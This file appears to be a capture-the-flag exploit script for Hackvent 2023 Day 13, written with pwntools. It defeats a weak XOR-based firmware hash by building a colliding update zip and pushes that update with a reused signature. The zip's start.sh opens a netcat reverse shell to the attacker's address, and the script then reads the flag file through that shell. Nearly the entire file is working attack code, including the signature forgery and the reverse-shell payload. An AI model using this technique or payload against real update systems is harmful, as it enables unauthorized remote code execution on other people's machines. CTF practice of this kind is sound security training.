Hackvent_2023/Day 13/exploit.py

80 lines
2.3 KiB
Python
Raw Permalink Normal View History

2023-12-19 16:28:13 +01:00
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host 5e6a25e4-70e9-4467-ab1a-caba58cdf8e8.rdocker.vuln.land --port 1337
from pwn import *
from io import BytesIO
from Crypto.Hash import SHA1
from Crypto.Util.number import long_to_bytes, bytes_to_long
from hackingscripts import util, rev_shell
import zipfile
host = args.HOST or '98db68c6-42be-4b6c-94f3-87a044a60d13.rdocker.vuln.land'
port = int(args.PORT or 1337)
def start_remote(argv=[], *a, **kw):
return connect(host, port)
def start(argv=[], *a, **kw):
return start_remote(argv, *a, **kw)
def hash_data(content):
h = 0
for i in range(0, len(content), 8):
h ^= sum([content[i+j] << 8*j for j in range(8) if i+j < len(content)])
return SHA1.new(hex(h).encode()).hexdigest()
def get_version():
io.recvuntil(b"$ ")
io.sendline(b"version")
data = io.recvuntil(b"\n\n")
return re.search(r"Version 1.3.3.7, Signature: (.*)", data.decode())[1]
def update(zip_file, signature):
io.recvuntil(b"$ ")
io.sendline(b"update")
io.recvuntil(b"> ")
io.sendline(base64.b64encode(zip_file))
io.recvuntil(b"> ")
io.sendline(signature.encode())
def send_exit():
io.recvuntil(b"$ ")
io.sendline(b"exit")
io = start()
with open("firmware.zip", "rb") as f:
orig_firmware = f.read()
orig_hash = hash_data(orig_firmware)
print("[+] Orig hash:", orig_hash)
ip_address = util.get_address()
shell_port = 1234
shell_cmd = rev_shell.generate_payload("nc", ip_address, shell_port, method="fifo", shell="/bin/sh")
zip_data = BytesIO()
with zipfile.ZipFile(zip_data, "w") as zip_file:
zip_file.writestr("start.sh", shell_cmd)
# new_zip ^ orig_firmware ^ new_zip == orig_firmware
initial_zip_data = zip_data.getvalue()
zip_data = initial_zip_data
zip_data = util.pad(zip_data, 8)
zip_data += orig_firmware
zip_data = util.pad(zip_data, 8)
zip_data += initial_zip_data
zip_hash = hash_data(zip_data)
print("[+] Update hash:", zip_hash)
assert zip_hash == orig_hash
signature = get_version()
print("[+] Signature:", signature)
shell = rev_shell.trigger_background_shell(lambda: update(zip_data, signature), shell_port)
flag = shell.exec_sync("cat /app/flag && echo")
shell.close()
send_exit()
io.close()
print("[+] Flag:", flag.decode())